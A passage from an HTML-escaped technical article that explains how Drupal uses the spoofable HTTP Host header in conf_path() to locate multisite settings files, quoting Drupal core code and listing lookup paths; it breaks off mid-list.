&lt;p&gt;The &lt;strong&gt;hostname&lt;/strong&gt; is a very important part of the client HTTP request. When you are requesting a website, which could be a drupal website, your client HTTP request will send several headers and on of theses headers is the hostname, it is the &lt;strong&gt;Host:&lt;/strong&gt; header:&lt;/p&gt;

&lt;pre&gt;&lt;code&gt;GET /page/foo?z=42 HTTP/1.1
Host: www.example.com
(other headers)
&lt;/code&gt;&lt;/pre&gt;

&lt;p&gt;The HTTP server receiving this request will decide which VirtualHost will have to handle the request, usually using the Host header to choose between several VirtualHosts (sometimes a same HTTP server is used to manage hundreds of websites). Usually this Host header should contain your website &lt;strong&gt;DNS&lt;/strong&gt;. This header is required for HTTP/1.1 and can also be used with HTTP/1.0.&lt;/p&gt;

&lt;p&gt;But this header is &lt;strong&gt;spoofable&lt;/strong&gt; by the client, so it could contain anything. Hopefully (or at least that&#39;s what you usually hope) having a bad Host header should prevent the request from reaching your valid Drupal installation because of several facts:&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;really bad injections (like null-bytes) are detected by the HTTP server and the connection is closed&lt;/li&gt;
&lt;li&gt;Headers cannot use more than 8000 characters (more or less), this limits the size of the spoofed header (but, hey, 8000 is quite huge)&lt;/li&gt;
&lt;li&gt;unrecognized hostnames goes to the default Virtualhost, which may not be your Drupal website&lt;/li&gt;
&lt;li&gt;Drupal also ensure this Hostname only contains a small subset of valid characters&lt;/li&gt;
&lt;li&gt;multiple Host headers are concatenated with &lt;code&gt;,&lt;/code&gt; (comma and space -- and drupal rejects spaces in headers)&lt;/li&gt;
&lt;/ul&gt;


&lt;p&gt;In 2013 an excellent paper on &lt;a href=&quot;http://www.skeletonscribe.net/2013/05/practical-http-host-header-attacks.html&quot;&gt;Practical Host headers attacks&lt;/a&gt; have been published by &lt;a href=&quot;https://plus.google.com/+JamesKettle/about&quot;&gt;James Kettle&lt;/a&gt; and we can see several very important facts in this paper:&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;the &lt;strong&gt;default Virtualhost protection does not work&lt;/strong&gt;, more on that at the end of this page. This is valid for both &lt;strong&gt;Nginx&lt;/strong&gt; and &lt;strong&gt;Apache&lt;/strong&gt;.&lt;/li&gt;
&lt;li&gt;any application having too much trust on this spoofable Header may suffers from issues.&lt;/li&gt;
&lt;/ul&gt;


&lt;p&gt;This paper was studied by the drupal security team, &lt;a href=&quot;https://www.drupal.org/node/2221699&quot;&gt;you can check the discussions here&lt;/a&gt;, and one fact to remember about this discussion is that &lt;strong&gt;you should always enforce the &lt;code&gt;$base_url&lt;/code&gt; setting&lt;/strong&gt; when running Drupal in production to avoid attacks based on password renewable mails.&lt;/p&gt;

&lt;p&gt;So far so good, no real problems.&lt;/p&gt;

&lt;h3&gt;conf_path() settings file search&lt;/h3&gt;

&lt;p&gt;Drupal already had a &lt;code&gt;drupal_valid_http_host&lt;/code&gt; function ensuring the hostnames did not contain bad characters like &lt;code&gt;/&lt;/code&gt;,&lt;code&gt;\&lt;/code&gt;,&lt;code&gt;%&lt;/code&gt;,&lt;code&gt;&lt;/code&gt; or &lt;code&gt;&amp;amp;&lt;/code&gt;. Only letters, digits, dots and &lt;code&gt;:&lt;/code&gt;. Not relying on the HTTP server to ensure a really clean Hostname, always good to add some security layers in the application.&lt;/p&gt;

&lt;p&gt;This was a good security point, because this hostname is used in &lt;code&gt;conf_path()&lt;/code&gt; function, and this is a very early function in the drupal bootstraping process.&lt;/p&gt;

&lt;p&gt;One of the early step done while bootstraping Drupal is to load the configuration file. This file will give you, for example, access to the database, or the &lt;code&gt;$base_url&lt;/code&gt; enforced setting.&lt;/p&gt;

&lt;div class=&quot;highlight&quot;&gt;&lt;pre&gt;&lt;code class=&quot;language-php&quot; data-lang=&quot;php&quot;&gt;&lt;span class=&quot;cp&quot;&gt;&amp;lt;?php&lt;/span&gt;
    &lt;span class=&quot;sd&quot;&gt;/**&lt;/span&gt;
&lt;span class=&quot;sd&quot;&gt;     * Sets the base URL, cookie domain, and session name from configuration.&lt;/span&gt;
&lt;span class=&quot;sd&quot;&gt;     */&lt;/span&gt;
    &lt;span class=&quot;k&quot;&gt;function&lt;/span&gt; &lt;span class=&quot;nf&quot;&gt;drupal_settings_initialize&lt;/span&gt;&lt;span class=&quot;p&quot;&gt;()&lt;/span&gt; &lt;span class=&quot;p&quot;&gt;{&lt;/span&gt;
      &lt;span class=&quot;k&quot;&gt;global&lt;/span&gt; &lt;span class=&quot;nv&quot;&gt;$base_url&lt;/span&gt;&lt;span class=&quot;p&quot;&gt;,&lt;/span&gt; &lt;span class=&quot;nv&quot;&gt;$base_path&lt;/span&gt;&lt;span class=&quot;p&quot;&gt;,&lt;/span&gt; &lt;span class=&quot;nv&quot;&gt;$base_root&lt;/span&gt;&lt;span class=&quot;p&quot;&gt;;&lt;/span&gt;
    
      &lt;span class=&quot;c1&quot;&gt;// Export these settings.php variables to the global namespace.&lt;/span&gt;
      &lt;span class=&quot;k&quot;&gt;global&lt;/span&gt; &lt;span class=&quot;nv&quot;&gt;$databases&lt;/span&gt;&lt;span class=&quot;p&quot;&gt;,&lt;/span&gt; &lt;span class=&quot;nv&quot;&gt;$cookie_domain&lt;/span&gt;&lt;span class=&quot;p&quot;&gt;,&lt;/span&gt; &lt;span class=&quot;nv&quot;&gt;$conf&lt;/span&gt;&lt;span class=&quot;p&quot;&gt;,&lt;/span&gt; &lt;span class=&quot;nv&quot;&gt;$installed_profile&lt;/span&gt;&lt;span class=&quot;p&quot;&gt;,&lt;/span&gt;     &lt;span class=&quot;nv&quot;&gt;$update_free_access&lt;/span&gt;&lt;span class=&quot;p&quot;&gt;,&lt;/span&gt; &lt;span class=&quot;nv&quot;&gt;$db_url&lt;/span&gt;&lt;span class=&quot;p&quot;&gt;,&lt;/span&gt; &lt;span class=&quot;nv&quot;&gt;$db_prefix&lt;/span&gt;&lt;span class=&quot;p&quot;&gt;,&lt;/span&gt; &lt;span class=&quot;nv&quot;&gt;$drupal_hash_salt&lt;/span&gt;&lt;span class=&quot;p&quot;&gt;,&lt;/span&gt; &lt;span class=&quot;nv&quot;&gt;$is_https&lt;/span&gt;&lt;span class=&quot;p&quot;&gt;,&lt;/span&gt; &lt;span class=&quot;nv&quot;&gt;$base_secure_url&lt;/span&gt;&lt;span class=&quot;p&quot;&gt;,&lt;/span&gt; &lt;span class=&quot;nv&quot;&gt;$base_insecure_url&lt;/span&gt;&lt;span class=&quot;p&quot;&gt;;&lt;/span&gt;
      &lt;span class=&quot;nv&quot;&gt;$conf&lt;/span&gt; &lt;span class=&quot;o&quot;&gt;=&lt;/span&gt; &lt;span class=&quot;k&quot;&gt;array&lt;/span&gt;&lt;span class=&quot;p&quot;&gt;();&lt;/span&gt;
    
      &lt;span class=&quot;k&quot;&gt;if&lt;/span&gt; &lt;span class=&quot;p&quot;&gt;(&lt;/span&gt;&lt;span class=&quot;nb&quot;&gt;file_exists&lt;/span&gt;&lt;span class=&quot;p&quot;&gt;(&lt;/span&gt;&lt;span class=&quot;nx&quot;&gt;DRUPAL_ROOT&lt;/span&gt; &lt;span class=&quot;o&quot;&gt;.&lt;/span&gt; &lt;span class=&quot;s1&quot;&gt;&amp;#39;/&amp;#39;&lt;/span&gt; &lt;span class=&quot;o&quot;&gt;.&lt;/span&gt; &lt;span class=&quot;nx&quot;&gt;conf_path&lt;/span&gt;&lt;span class=&quot;p&quot;&gt;()&lt;/span&gt; &lt;span class=&quot;o&quot;&gt;.&lt;/span&gt; &lt;span class=&quot;s1&quot;&gt;&amp;#39;/settings.php&amp;#39;&lt;/span&gt;&lt;span class=&quot;p&quot;&gt;))&lt;/span&gt; &lt;span class=&quot;p&quot;&gt;{&lt;/span&gt;
        &lt;span class=&quot;k&quot;&gt;include_once&lt;/span&gt; &lt;span class=&quot;nx&quot;&gt;DRUPAL_ROOT&lt;/span&gt; &lt;span class=&quot;o&quot;&gt;.&lt;/span&gt; &lt;span class=&quot;s1&quot;&gt;&amp;#39;/&amp;#39;&lt;/span&gt; &lt;span class=&quot;o&quot;&gt;.&lt;/span&gt; &lt;span class=&quot;nx&quot;&gt;conf_path&lt;/span&gt;&lt;span class=&quot;p&quot;&gt;()&lt;/span&gt; &lt;span class=&quot;o&quot;&gt;.&lt;/span&gt; &lt;span class=&quot;s1&quot;&gt;&amp;#39;/settings.php&amp;#39;&lt;/span&gt;&lt;span class=&quot;p&quot;&gt;;&lt;/span&gt;
      &lt;span class=&quot;p&quot;&gt;}&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;


&lt;p&gt;Here we see that the settings path depends on the &lt;code&gt;conf_path()&lt;/code&gt; call. This function is quite short, there&#39;s a &lt;code&gt;drupal_static&lt;/code&gt; thing which is simply a way to avoid re-doing stuff after the first call (in the same HTTP request), it&#39;s basically a lazy-loading-run-only-once shortcut.&lt;/p&gt;

&lt;div class=&quot;highlight&quot;&gt;&lt;pre&gt;&lt;code class=&quot;language-php&quot; data-lang=&quot;php&quot;&gt;&lt;span class=&quot;cp&quot;&gt;&amp;lt;?php&lt;/span&gt;
    &lt;span class=&quot;k&quot;&gt;function&lt;/span&gt; &lt;span class=&quot;nf&quot;&gt;conf_path&lt;/span&gt;&lt;span class=&quot;p&quot;&gt;(&lt;/span&gt;&lt;span class=&quot;nv&quot;&gt;$require_settings&lt;/span&gt; &lt;span class=&quot;o&quot;&gt;=&lt;/span&gt; &lt;span class=&quot;k&quot;&gt;TRUE&lt;/span&gt;&lt;span class=&quot;p&quot;&gt;,&lt;/span&gt; &lt;span class=&quot;nv&quot;&gt;$reset&lt;/span&gt; &lt;span class=&quot;o&quot;&gt;=&lt;/span&gt; &lt;span class=&quot;k&quot;&gt;FALSE&lt;/span&gt;&lt;span class=&quot;p&quot;&gt;)&lt;/span&gt; &lt;span class=&quot;p&quot;&gt;{&lt;/span&gt;
      &lt;span class=&quot;nv&quot;&gt;$conf&lt;/span&gt; &lt;span class=&quot;o&quot;&gt;=&lt;/span&gt; &lt;span class=&quot;o&quot;&gt;&amp;amp;&lt;/span&gt;&lt;span class=&quot;nx&quot;&gt;drupal_static&lt;/span&gt;&lt;span class=&quot;p&quot;&gt;(&lt;/span&gt;&lt;span class=&quot;nx&quot;&gt;__FUNCTION__&lt;/span&gt;&lt;span class=&quot;p&quot;&gt;,&lt;/span&gt; &lt;span class=&quot;s1&quot;&gt;&amp;#39;&amp;#39;&lt;/span&gt;&lt;span class=&quot;p&quot;&gt;);&lt;/span&gt;
    
      &lt;span class=&quot;k&quot;&gt;if&lt;/span&gt; &lt;span class=&quot;p&quot;&gt;(&lt;/span&gt;&lt;span class=&quot;nv&quot;&gt;$conf&lt;/span&gt; &lt;span class=&quot;o&quot;&gt;&amp;amp;&amp;amp;&lt;/span&gt; &lt;span class=&quot;o&quot;&gt;!&lt;/span&gt;&lt;span class=&quot;nv&quot;&gt;$reset&lt;/span&gt;&lt;span class=&quot;p&quot;&gt;)&lt;/span&gt; &lt;span class=&quot;p&quot;&gt;{&lt;/span&gt;
        &lt;span class=&quot;k&quot;&gt;return&lt;/span&gt; &lt;span class=&quot;nv&quot;&gt;$conf&lt;/span&gt;&lt;span class=&quot;p&quot;&gt;;&lt;/span&gt; &lt;span class=&quot;c1&quot;&gt;//&amp;lt;-- here is the run-only-once thing I was talking about&lt;/span&gt;
      &lt;span class=&quot;p&quot;&gt;}&lt;/span&gt;
    
      &lt;span class=&quot;nv&quot;&gt;$confdir&lt;/span&gt; &lt;span class=&quot;o&quot;&gt;=&lt;/span&gt; &lt;span class=&quot;s1&quot;&gt;&amp;#39;sites&amp;#39;&lt;/span&gt;&lt;span class=&quot;p&quot;&gt;;&lt;/span&gt;
    
      &lt;span class=&quot;nv&quot;&gt;$sites&lt;/span&gt; &lt;span class=&quot;o&quot;&gt;=&lt;/span&gt; &lt;span class=&quot;k&quot;&gt;array&lt;/span&gt;&lt;span class=&quot;p&quot;&gt;();&lt;/span&gt;
      &lt;span class=&quot;k&quot;&gt;if&lt;/span&gt; &lt;span class=&quot;p&quot;&gt;(&lt;/span&gt;&lt;span class=&quot;nb&quot;&gt;file_exists&lt;/span&gt;&lt;span class=&quot;p&quot;&gt;(&lt;/span&gt;&lt;span class=&quot;nx&quot;&gt;DRUPAL_ROOT&lt;/span&gt; &lt;span class=&quot;o&quot;&gt;.&lt;/span&gt; &lt;span class=&quot;s1&quot;&gt;&amp;#39;/&amp;#39;&lt;/span&gt; &lt;span class=&quot;o&quot;&gt;.&lt;/span&gt; &lt;span class=&quot;nv&quot;&gt;$confdir&lt;/span&gt; &lt;span class=&quot;o&quot;&gt;.&lt;/span&gt; &lt;span class=&quot;s1&quot;&gt;&amp;#39;/sites.php&amp;#39;&lt;/span&gt;&lt;span class=&quot;p&quot;&gt;))&lt;/span&gt; &lt;span class=&quot;p&quot;&gt;{&lt;/span&gt;
        &lt;span class=&quot;c1&quot;&gt;// This will overwrite $sites with the desired mappings.&lt;/span&gt;
        &lt;span class=&quot;k&quot;&gt;include&lt;/span&gt;&lt;span class=&quot;p&quot;&gt;(&lt;/span&gt;&lt;span class=&quot;nx&quot;&gt;DRUPAL_ROOT&lt;/span&gt; &lt;span class=&quot;o&quot;&gt;.&lt;/span&gt; &lt;span class=&quot;s1&quot;&gt;&amp;#39;/&amp;#39;&lt;/span&gt; &lt;span class=&quot;o&quot;&gt;.&lt;/span&gt; &lt;span class=&quot;nv&quot;&gt;$confdir&lt;/span&gt; &lt;span class=&quot;o&quot;&gt;.&lt;/span&gt; &lt;span class=&quot;s1&quot;&gt;&amp;#39;/sites.php&amp;#39;&lt;/span&gt;&lt;span class=&quot;p&quot;&gt;);&lt;/span&gt;
      &lt;span class=&quot;p&quot;&gt;}&lt;/span&gt;
    
      &lt;span class=&quot;nv&quot;&gt;$uri&lt;/span&gt; &lt;span class=&quot;o&quot;&gt;=&lt;/span&gt; &lt;span class=&quot;nb&quot;&gt;explode&lt;/span&gt;&lt;span class=&quot;p&quot;&gt;(&lt;/span&gt;&lt;span class=&quot;s1&quot;&gt;&amp;#39;/&amp;#39;&lt;/span&gt;&lt;span class=&quot;p&quot;&gt;,&lt;/span&gt; &lt;span class=&quot;nv&quot;&gt;$_SERVER&lt;/span&gt;&lt;span class=&quot;p&quot;&gt;[&lt;/span&gt;&lt;span class=&quot;s1&quot;&gt;&amp;#39;SCRIPT_NAME&amp;#39;&lt;/span&gt;&lt;span class=&quot;p&quot;&gt;]&lt;/span&gt; &lt;span class=&quot;o&quot;&gt;?&lt;/span&gt; &lt;span class=&quot;nv&quot;&gt;$_SERVER&lt;/span&gt;&lt;span class=&quot;p&quot;&gt;[&lt;/span&gt;&lt;span class=&quot;s1&quot;&gt;&amp;#39;SCRIPT_NAME&amp;#39;&lt;/span&gt;&lt;span class=&quot;p&quot;&gt;]&lt;/span&gt; &lt;span class=&quot;o&quot;&gt;:&lt;/span&gt; &lt;span class=&quot;nv&quot;&gt;$_SERVER&lt;/span&gt;&lt;span class=&quot;p&quot;&gt;[&lt;/span&gt;&lt;span class=&quot;s1&quot;&gt;&amp;#39;SCRIPT_FILENAME&amp;#39;&lt;/span&gt;&lt;span class=&quot;p&quot;&gt;]);&lt;/span&gt;
      &lt;span class=&quot;nv&quot;&gt;$server&lt;/span&gt; &lt;span class=&quot;o&quot;&gt;=&lt;/span&gt; &lt;span class=&quot;nb&quot;&gt;explode&lt;/span&gt;&lt;span class=&quot;p&quot;&gt;(&lt;/span&gt;&lt;span class=&quot;s1&quot;&gt;&amp;#39;.&amp;#39;&lt;/span&gt;&lt;span class=&quot;p&quot;&gt;,&lt;/span&gt; &lt;span class=&quot;nb&quot;&gt;implode&lt;/span&gt;&lt;span class=&quot;p&quot;&gt;(&lt;/span&gt;&lt;span class=&quot;s1&quot;&gt;&amp;#39;.&amp;#39;&lt;/span&gt;&lt;span class=&quot;p&quot;&gt;,&lt;/span&gt; &lt;span class=&quot;nb&quot;&gt;array_reverse&lt;/span&gt;&lt;span class=&quot;p&quot;&gt;(&lt;/span&gt;&lt;span class=&quot;nb&quot;&gt;explode&lt;/span&gt;&lt;span class=&quot;p&quot;&gt;(&lt;/span&gt;&lt;span class=&quot;s1&quot;&gt;&amp;#39;:&amp;#39;&lt;/span&gt;&lt;span class=&quot;p&quot;&gt;,&lt;/span&gt; &lt;span class=&quot;nb&quot;&gt;rtrim&lt;/span&gt;&lt;span class=&quot;p&quot;&gt;(&lt;/span&gt;&lt;span class=&quot;nv&quot;&gt;$_SERVER&lt;/span&gt;&lt;span class=&quot;p&quot;&gt;[&lt;/span&gt;&lt;span class=&quot;s1&quot;&gt;&amp;#39;HTTP_HOST&amp;#39;&lt;/span&gt;&lt;span class=&quot;p&quot;&gt;],&lt;/span&gt; &lt;span class=&quot;s1&quot;&gt;&amp;#39;.&amp;#39;&lt;/span&gt;&lt;span class=&quot;p&quot;&gt;)))));&lt;/span&gt;
      &lt;span class=&quot;k&quot;&gt;for&lt;/span&gt; &lt;span class=&quot;p&quot;&gt;(&lt;/span&gt;&lt;span class=&quot;nv&quot;&gt;$i&lt;/span&gt; &lt;span class=&quot;o&quot;&gt;=&lt;/span&gt; &lt;span class=&quot;nb&quot;&gt;count&lt;/span&gt;&lt;span class=&quot;p&quot;&gt;(&lt;/span&gt;&lt;span class=&quot;nv&quot;&gt;$uri&lt;/span&gt;&lt;span class=&quot;p&quot;&gt;)&lt;/span&gt; &lt;span class=&quot;o&quot;&gt;-&lt;/span&gt; &lt;span class=&quot;mi&quot;&gt;1&lt;/span&gt;&lt;span class=&quot;p&quot;&gt;;&lt;/span&gt; &lt;span class=&quot;nv&quot;&gt;$i&lt;/span&gt; &lt;span class=&quot;o&quot;&gt;&amp;gt;&lt;/span&gt; &lt;span class=&quot;mi&quot;&gt;0&lt;/span&gt;&lt;span class=&quot;p&quot;&gt;;&lt;/span&gt; &lt;span class=&quot;nv&quot;&gt;$i&lt;/span&gt;&lt;span class=&quot;o&quot;&gt;--&lt;/span&gt;&lt;span class=&quot;p&quot;&gt;)&lt;/span&gt; &lt;span class=&quot;p&quot;&gt;{&lt;/span&gt;
        &lt;span class=&quot;k&quot;&gt;for&lt;/span&gt; &lt;span class=&quot;p&quot;&gt;(&lt;/span&gt;&lt;span class=&quot;nv&quot;&gt;$j&lt;/span&gt; &lt;span class=&quot;o&quot;&gt;=&lt;/span&gt; &lt;span class=&quot;nb&quot;&gt;count&lt;/span&gt;&lt;span class=&quot;p&quot;&gt;(&lt;/span&gt;&lt;span class=&quot;nv&quot;&gt;$server&lt;/span&gt;&lt;span class=&quot;p&quot;&gt;);&lt;/span&gt; &lt;span class=&quot;nv&quot;&gt;$j&lt;/span&gt; &lt;span class=&quot;o&quot;&gt;&amp;gt;&lt;/span&gt; &lt;span class=&quot;mi&quot;&gt;0&lt;/span&gt;&lt;span class=&quot;p&quot;&gt;;&lt;/span&gt; &lt;span class=&quot;nv&quot;&gt;$j&lt;/span&gt;&lt;span class=&quot;o&quot;&gt;--&lt;/span&gt;&lt;span class=&quot;p&quot;&gt;)&lt;/span&gt; &lt;span class=&quot;p&quot;&gt;{&lt;/span&gt;
          &lt;span class=&quot;nv&quot;&gt;$dir&lt;/span&gt; &lt;span class=&quot;o&quot;&gt;=&lt;/span&gt; &lt;span class=&quot;nb&quot;&gt;implode&lt;/span&gt;&lt;span class=&quot;p&quot;&gt;(&lt;/span&gt;&lt;span class=&quot;s1&quot;&gt;&amp;#39;.&amp;#39;&lt;/span&gt;&lt;span class=&quot;p&quot;&gt;,&lt;/span&gt; &lt;span class=&quot;nb&quot;&gt;array_slice&lt;/span&gt;&lt;span class=&quot;p&quot;&gt;(&lt;/span&gt;&lt;span class=&quot;nv&quot;&gt;$server&lt;/span&gt;&lt;span class=&quot;p&quot;&gt;,&lt;/span&gt; &lt;span class=&quot;o&quot;&gt;-&lt;/span&gt;&lt;span class=&quot;nv&quot;&gt;$j&lt;/span&gt;&lt;span class=&quot;p&quot;&gt;))&lt;/span&gt; &lt;span class=&quot;o&quot;&gt;.&lt;/span&gt; &lt;span class=&quot;nb&quot;&gt;implode&lt;/span&gt;&lt;span class=&quot;p&quot;&gt;(&lt;/span&gt;&lt;span class=&quot;s1&quot;&gt;&amp;#39;.&amp;#39;&lt;/span&gt;&lt;span class=&quot;p&quot;&gt;,&lt;/span&gt; &lt;span class=&quot;nb&quot;&gt;array_slice&lt;/span&gt;&lt;span class=&quot;p&quot;&gt;(&lt;/span&gt;&lt;span class=&quot;nv&quot;&gt;$uri&lt;/span&gt;&lt;span class=&quot;p&quot;&gt;,&lt;/span&gt; &lt;span class=&quot;mi&quot;&gt;0&lt;/span&gt;&lt;span class=&quot;p&quot;&gt;,&lt;/span&gt; &lt;span class=&quot;nv&quot;&gt;$i&lt;/span&gt;&lt;span class=&quot;p&quot;&gt;));&lt;/span&gt;
          &lt;span class=&quot;k&quot;&gt;if&lt;/span&gt; &lt;span class=&quot;p&quot;&gt;(&lt;/span&gt;&lt;span class=&quot;nb&quot;&gt;isset&lt;/span&gt;&lt;span class=&quot;p&quot;&gt;(&lt;/span&gt;&lt;span class=&quot;nv&quot;&gt;$sites&lt;/span&gt;&lt;span class=&quot;p&quot;&gt;[&lt;/span&gt;&lt;span class=&quot;nv&quot;&gt;$dir&lt;/span&gt;&lt;span class=&quot;p&quot;&gt;])&lt;/span&gt; &lt;span class=&quot;o&quot;&gt;&amp;amp;&amp;amp;&lt;/span&gt; &lt;span class=&quot;nb&quot;&gt;file_exists&lt;/span&gt;&lt;span class=&quot;p&quot;&gt;(&lt;/span&gt;&lt;span class=&quot;nx&quot;&gt;DRUPAL_ROOT&lt;/span&gt; &lt;span class=&quot;o&quot;&gt;.&lt;/span&gt; &lt;span class=&quot;s1&quot;&gt;&amp;#39;/&amp;#39;&lt;/span&gt; &lt;span class=&quot;o&quot;&gt;.&lt;/span&gt; &lt;span class=&quot;nv&quot;&gt;$confdir&lt;/span&gt; &lt;span class=&quot;o&quot;&gt;.&lt;/span&gt; &lt;span class=&quot;s1&quot;&gt;&amp;#39;/&amp;#39;&lt;/span&gt; &lt;span class=&quot;o&quot;&gt;.&lt;/span&gt; &lt;span class=&quot;nv&quot;&gt;$sites&lt;/span&gt;&lt;span class=&quot;p&quot;&gt;[&lt;/span&gt;&lt;span class=&quot;nv&quot;&gt;$dir&lt;/span&gt;&lt;span class=&quot;p&quot;&gt;]))&lt;/span&gt; &lt;span class=&quot;p&quot;&gt;{&lt;/span&gt;
            &lt;span class=&quot;nv&quot;&gt;$dir&lt;/span&gt; &lt;span class=&quot;o&quot;&gt;=&lt;/span&gt; &lt;span class=&quot;nv&quot;&gt;$sites&lt;/span&gt;&lt;span class=&quot;p&quot;&gt;[&lt;/span&gt;&lt;span class=&quot;nv&quot;&gt;$dir&lt;/span&gt;&lt;span class=&quot;p&quot;&gt;];&lt;/span&gt;
          &lt;span class=&quot;p&quot;&gt;}&lt;/span&gt;
          &lt;span class=&quot;k&quot;&gt;if&lt;/span&gt; &lt;span class=&quot;p&quot;&gt;(&lt;/span&gt;&lt;span class=&quot;nb&quot;&gt;file_exists&lt;/span&gt;&lt;span class=&quot;p&quot;&gt;(&lt;/span&gt;&lt;span class=&quot;nx&quot;&gt;DRUPAL_ROOT&lt;/span&gt; &lt;span class=&quot;o&quot;&gt;.&lt;/span&gt; &lt;span class=&quot;s1&quot;&gt;&amp;#39;/&amp;#39;&lt;/span&gt; &lt;span class=&quot;o&quot;&gt;.&lt;/span&gt; &lt;span class=&quot;nv&quot;&gt;$confdir&lt;/span&gt; &lt;span class=&quot;o&quot;&gt;.&lt;/span&gt; &lt;span class=&quot;s1&quot;&gt;&amp;#39;/&amp;#39;&lt;/span&gt; &lt;span class=&quot;o&quot;&gt;.&lt;/span&gt; &lt;span class=&quot;nv&quot;&gt;$dir&lt;/span&gt; &lt;span class=&quot;o&quot;&gt;.&lt;/span&gt; &lt;span class=&quot;s1&quot;&gt;&amp;#39;/settings.php&amp;#39;&lt;/span&gt;&lt;span class=&quot;p&quot;&gt;)&lt;/span&gt; &lt;span class=&quot;o&quot;&gt;||&lt;/span&gt; &lt;span class=&quot;p&quot;&gt;(&lt;/span&gt;&lt;span class=&quot;o&quot;&gt;!&lt;/span&gt;&lt;span class=&quot;nv&quot;&gt;$require_settings&lt;/span&gt; &lt;span class=&quot;o&quot;&gt;&amp;amp;&amp;amp;&lt;/span&gt; &lt;span class=&quot;nb&quot;&gt;file_exists&lt;/span&gt;&lt;span class=&quot;p&quot;&gt;(&lt;/span&gt;&lt;span class=&quot;nx&quot;&gt;DRUPAL_ROOT&lt;/span&gt; &lt;span class=&quot;o&quot;&gt;.&lt;/span&gt; &lt;span class=&quot;s1&quot;&gt;&amp;#39;/&amp;#39;&lt;/span&gt; &lt;span class=&quot;o&quot;&gt;.&lt;/span&gt; &lt;span class=&quot;nv&quot;&gt;$confdir&lt;/span&gt; &lt;span class=&quot;o&quot;&gt;.&lt;/span&gt; &lt;span class=&quot;s1&quot;&gt;&amp;#39;/&amp;#39;&lt;/span&gt; &lt;span class=&quot;o&quot;&gt;.&lt;/span&gt; &lt;span class=&quot;nv&quot;&gt;$dir&lt;/span&gt;&lt;span class=&quot;p&quot;&gt;)))&lt;/span&gt; &lt;span class=&quot;p&quot;&gt;{&lt;/span&gt;
            &lt;span class=&quot;nv&quot;&gt;$conf&lt;/span&gt; &lt;span class=&quot;o&quot;&gt;=&lt;/span&gt; &lt;span class=&quot;s2&quot;&gt;&amp;quot;&lt;/span&gt;&lt;span class=&quot;si&quot;&gt;$confdir&lt;/span&gt;&lt;span class=&quot;s2&quot;&gt;/&lt;/span&gt;&lt;span class=&quot;si&quot;&gt;$dir&lt;/span&gt;&lt;span class=&quot;s2&quot;&gt;&amp;quot;&lt;/span&gt;&lt;span class=&quot;p&quot;&gt;;&lt;/span&gt;
            &lt;span class=&quot;k&quot;&gt;return&lt;/span&gt; &lt;span class=&quot;nv&quot;&gt;$conf&lt;/span&gt;&lt;span class=&quot;p&quot;&gt;;&lt;/span&gt;
          &lt;span class=&quot;p&quot;&gt;}&lt;/span&gt;
        &lt;span class=&quot;p&quot;&gt;}&lt;/span&gt;
      &lt;span class=&quot;p&quot;&gt;}&lt;/span&gt;
      &lt;span class=&quot;nv&quot;&gt;$conf&lt;/span&gt; &lt;span class=&quot;o&quot;&gt;=&lt;/span&gt; &lt;span class=&quot;s2&quot;&gt;&amp;quot;&lt;/span&gt;&lt;span class=&quot;si&quot;&gt;$confdir&lt;/span&gt;&lt;span class=&quot;s2&quot;&gt;/default&amp;quot;&lt;/span&gt;&lt;span class=&quot;p&quot;&gt;;&lt;/span&gt;
      &lt;span class=&quot;k&quot;&gt;return&lt;/span&gt; &lt;span class=&quot;nv&quot;&gt;$conf&lt;/span&gt;&lt;span class=&quot;p&quot;&gt;;&lt;/span&gt;
    &lt;span class=&quot;p&quot;&gt;}&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;


&lt;p&gt;What this code does is testing the requested hostname to see if a specific settings directory exists for this Host; this is the &lt;strong&gt;core functionality of drupal multisites&lt;/strong&gt;. By default you have the &lt;em&gt;default&lt;/em&gt; settings in the directory &lt;code&gt;&amp;lt;www&amp;gt;/sites/default&lt;/code&gt;, you can then use a &lt;code&gt;&amp;lt;www&amp;gt;/sites/sites.php&lt;/code&gt; file to map hostnames with other settings files -- but this will only cover names that you &lt;strong&gt;do&lt;/strong&gt; have, not the bad ones --, and you &lt;em&gt;can&lt;/em&gt; also have some directories based on the hostname, or part of it, containing a &lt;code&gt;settings.php&lt;/code&gt; file. Note that you &lt;strong&gt;cannot suspend this multisite feature&lt;/strong&gt;, it&#39;s always there, no opt-in or opt-out until Drupal 8 release.&lt;/p&gt;

&lt;p&gt;If the hostname is &lt;code&gt;www.example.com:8080&lt;/code&gt; and the bootstraped drupal file is &lt;code&gt;&amp;lt;www&amp;gt;/index.php&lt;/code&gt;, Drupal will check for theses files (in this order):&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;&lt;code&gt;www/sites/8080.www.example.com/settings.php&lt;/code&gt;&lt;/li&gt;
&lt;li&gt;&lt;code&gt;www/sites/www.example.com/settings.php&lt;/code&gt;&lt;/li&gt;
&lt;li&gt;&lt;code&gt;www/sites/example.com/settings.php&lt;/code&gt;&lt;/li&gt;
&lt;li&gt;&lt;code&gt;www/sites/com/settings.php&lt;/code&gt;&lt;/li&gt;
&lt;li&gt;&lt;code&gt;www/sites/www.example.com/settings.php&lt;/code&gt;&lt;/li&gt;
&lt;li&gt;&lt;code&gt;www/sites/default/settings.php&lt;/code&gt;&lt;/li&gt;
&lt;/ul&gt;


&lt;p&gt;If the hostname is &lt;code&gt;www.example.com:8080&lt;/code&gt; and the bootstraped drupal file is &lt;code&gt;www/modules/statistics/statistics.php&lt;/code&gt;, Drupal will check theses files:&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;&lt;code&gt;www/sites/8080.www.example.com.modules.statistics/settings.php&lt;/code&gt;&lt;/li&gt;
&lt;li&gt;&lt;code&gt;www/sites/www.example.com.modules.statistics/settings.php&lt;/code&gt;&lt;/li&gt;
&lt;li&gt;&lt;code&gt;www/sites/example.com.modules.statistics/settings.php&lt;/code&gt;&lt;/li&gt;
&lt;li&gt;&lt;code&gt;www/sites/com.modules.statistics/settings.php&lt;/code&gt;&lt;/li&gt;
&lt;li&gt;&lt;code&gt;www/sites/8080.www.example.com.modules/settings.php&lt;/code&gt;&lt;/li&gt;
&lt;li&gt;&lt;code&gt;www/sites/www.example.com.modules/settings.php&lt;/code&gt;&lt;/li&gt;
&lt;li&gt;&lt;code&gt;www/sites/example.com.modules/settings.php&lt;/code&gt;&lt;/li&gt;
